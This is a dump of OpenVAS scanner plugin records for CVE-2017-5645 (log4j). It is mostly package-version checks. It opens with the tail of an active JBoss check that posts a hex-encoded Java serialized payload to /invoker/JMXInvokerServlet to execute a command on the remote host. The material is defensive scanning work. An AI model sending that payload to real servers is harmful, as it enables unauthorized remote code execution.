raw_string(\n0x74,0x00,0x04,0x65,0x78,0x65,0x63,0x75,0x71,0x00,0x7e,0x00,0x1e,0x00,0x00,0x00,\n0x01,0x71,0x00,0x7e,0x00,0x23,0x73,0x71,0x00,0x7e,0x00,0x11,0x73,0x72,0x00,0x11,\n0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x49,0x6e,0x74,0x65,0x67,0x65,\n0x72,0x12,0xe2,0xa0,0xa4,0xf7,0x81,0x87,0x38,0x02,0x00,0x01,0x49,0x00,0x05,0x76,\n0x61,0x6c,0x75,0x65,0x78,0x72,0x00,0x10,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,\n0x67,0x2e,0x4e,0x75,0x6d,0x62,0x65,0x72,0x86,0xac,0x95,0x1d,0x0b,0x94,0xe0,0x8b,\n0x02,0x00,0x00,0x78,0x70,0x00,0x00,0x00,0x01,0x73,0x72,0x00,0x11,0x6a,0x61,0x76,\n0x61,0x2e,0x75,0x74,0x69,0x6c,0x2e,0x48,0x61,0x73,0x68,0x4d,0x61,0x70,0x05,0x07,\n0xda,0xc1,0xc3,0x16,0x60,0xd1,0x03,0x00,0x02,0x46,0x00,0x0a,0x6c,0x6f,0x61,0x64,\n0x46,0x61,0x63,0x74,0x6f,0x72,0x49,0x00,0x09,0x74,0x68,0x72,0x65,0x73,0x68,0x6f,\n0x6c,0x64,0x78,0x70,0x3f,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x77,0x08,0x00,0x00,\n0x00,0x10,0x00,0x00,0x00,0x00,0x78,0x78,0x76,0x72,0x00,0x12,0x6a,0x61,0x76,0x61,\n0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x4f,0x76,0x65,0x72,0x72,0x69,0x64,0x65,0x00,0x00,\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x78,0x70,0x71,0x00,0x7e,0x00,0x3a);\n\nreq = http_post_put_req( port:port, url:\"/invoker/JMXInvokerServlet\", data:ex,\n add_headers: make_array( \"Content-Type\", \"application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue\" ) );\n\nres = send_capture( socket:soc,\n data:req,\n timeout:5,\n pcap_filter: \"icmp and icmp[0] = 8 and dst host \" + this_host() + \" and src host \" + get_host_ip() );\n\nclose( soc );\n\nif( res && ( win || vt_string >< res ) ) {\n report = 'By sending a special crafted serialized stream it was possible to execute `' + cmd + '` on the remote host\\nReceived answer:\\n\\n' + hexdump(ddata:( res ) );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:54", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-06-13T00:00:00", "type": "openvas", "title": "Fedora Update for log4j12 FEDORA-2017-7e0ff7f73a", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5645"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310872757", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872757", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for log4j12 FEDORA-2017-7e0ff7f73a\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872757\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-06-13 13:16:28 +0200 (Tue, 13 Jun 2017)\");\n script_cve_id(\"CVE-2017-5645\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for log4j12 FEDORA-2017-7e0ff7f73a\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'log4j12'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"log4j12 on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-7e0ff7f73a\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HJPT4UHOVQSPUC47NUDTP3HBLP5SRHZQ\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"log4j12\", rpm:\"log4j12~1.2.17~19.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:11", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-08-08T00:00:00", "type": "openvas", "title": "RedHat Update for log4j RHSA-2017:2423-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5645"], "modified": "2018-11-23T00:00:00", "id": "OPENVAS:1361412562310871877", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871877", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_RHSA-2017_2423-01_log4j.nasl 12497 2018-11-23 08:28:21Z cfischer $\n#\n# RedHat Update for log4j RHSA-2017:2423-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871877\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-08 07:19:05 +0200 (Tue, 08 Aug 2017)\");\n script_cve_id(\"CVE-2017-5645\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for log4j RHSA-2017:2423-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'log4j'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Log4j is a tool to help the programmer\noutput log statements to a variety of output targets.\n\nSecurity Fix(es):\n\n * It was found that when using remote logging with log4j socket server the\nlog4j server would deserialize any log event received via TCP or UDP. An\nattacker could use this flaw to send a specially crafted log event that,\nduring deserialization, would execute arbitrary code in the context of the\nlogger application. (CVE-2017-5645)\");\n script_tag(name:\"affected\", value:\"log4j on Red Hat Enterprise Linux Server (v. 7)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2017:2423-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2017-August/msg00038.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_7\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"log4j\", rpm:\"log4j~1.2.17~16.el7_4\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:28", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-05-05T00:00:00", "type": "openvas", "title": "Fedora Update for log4j FEDORA-2017-2ccfbd650a", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5645"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310872638", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872638", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for log4j FEDORA-2017-2ccfbd650a\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872638\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-05-05 07:02:49 +0200 (Fri, 05 May 2017)\");\n script_cve_id(\"CVE-2017-5645\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for log4j FEDORA-2017-2ccfbd650a\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'log4j'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"log4j on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-2ccfbd650a\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6GRJUJEODY3SNNFMDQJMKCO64EW4WZAW\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"log4j\", rpm:\"log4j~2.5~3.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:49", "description": "This host is installed with Oracle BI Publisher\n and is prone to a code execution vulnerability.", "cvss3": {}, "published": "2018-10-18T00:00:00", "type": "openvas", "title": "Oracle BI Publisher Code Execution Vulnerability (oct2018-4428296)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5645"], "modified": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310814409", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814409", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle BI Publisher Code Execution Vulnerability (oct2018-4428296)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:oracle:business_intelligence_publisher\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814409\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_cve_id(\"CVE-2017-5645\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-10-18 16:42:53 +0530 (Thu, 18 Oct 2018)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_name(\"Oracle BI Publisher Code Execution Vulnerability (oct2018-4428296)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Oracle BI Publisher\n and is prone to a code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Check if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exist due to an unspecified\n error in BI Publisher Security (Apache Log4j) component.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n attackers to execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"Oracle BI Publisher versions 11.1.1.7.0,\n 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0\");\n\n script_tag(name:\"solution\", value:\"Apply the latest patch from vendor. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_oracle_bi_publisher_detect.nasl\");\n script_mandatory_keys(\"Oracle/BI/Publisher/Enterprise/installed\");\n script_require_ports(\"Services/www\", 9704);\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!obpPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:obpPort, exit_no_version:TRUE)) exit(0);\nobpVer = infos['version'];\npath = infos['location'];\n\naffected = make_list('11.1.1.7.0', '11.1.1.9.0', '12.2.1.3.0', '12.2.1.4.0');\nforeach version (affected)\n{\n if(obpVer == version)\n {\n report = report_fixed_ver(installed_version:obpVer, fixed_version: \"Apply the patch\", install_path:path);\n security_message(port:obpPort, data:report);\n exit(0);\n }\n}\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:39:47", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for log4j (EulerOS-SA-2017-1214)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5645"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220171214", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220171214", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2017.1214\");\n script_version(\"2020-01-23T10:59:33+0000\");\n script_cve_id(\"CVE-2017-5645\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 10:59:33 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 10:59:33 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for log4j (EulerOS-SA-2017-1214)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP2\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2017-1214\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1214\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'log4j' package(s) announced via the EulerOS-SA-2017-1214 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was found that when using remote logging with log4j socket server the log4j server would deserialize any log event received via TCP or UDP. An attacker could use this flaw to send a specially crafted log event that, during deserialization, would execute arbitrary code in the context of the logger application. (CVE-2017-5645)\");\n\n script_tag(name:\"affected\", value:\"'log4j' package(s) on Huawei EulerOS V2.0SP2.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP2\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"log4j\", rpm:\"log4j~1.2.17~16\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:18", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-06-13T00:00:00", "type": "openvas", "title": "Fedora Update for log4j12 FEDORA-2017-8348115acd", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5645"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310872759", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872759", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for log4j12 FEDORA-2017-8348115acd\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872759\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-06-13 13:16:33 +0200 (Tue, 13 Jun 2017)\");\n script_cve_id(\"CVE-2017-5645\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for log4j12 FEDORA-2017-8348115acd\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'log4j12'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"log4j12 on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-8348115acd\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RS6LAXEJOL4LHVMUZYRNYICQN24X7PG6\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"log4j12\", rpm:\"log4j12~1.2.17~19.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:38:54", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for log4j (EulerOS-SA-2017-1213)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5645"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220171213", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220171213", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2017.1213\");\n script_version(\"2020-01-23T10:59:31+0000\");\n script_cve_id(\"CVE-2017-5645\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 10:59:31 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 10:59:31 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for log4j (EulerOS-SA-2017-1213)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP1\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2017-1213\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1213\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'log4j' package(s) announced via the EulerOS-SA-2017-1213 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was found that when using remote logging with log4j socket server the log4j server would deserialize any log event received via TCP or UDP. An attacker could use this flaw to send a specially crafted log event that, during deserialization, would execute arbitrary code in the context of the logger application. (CVE-2017-5645)\");\n\n script_tag(name:\"affected\", value:\"'log4j' package(s) on Huawei EulerOS V2.0SP1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"log4j\", rpm:\"log4j~1.2.17~16\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:33", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-05-03T00:00:00", "type": "openvas", "title": "Fedora Update for log4j FEDORA-2017-511ebfa8a3", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5645"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310872637", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872637", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for log4j FEDORA-2017-511ebfa8a3\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872637\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n 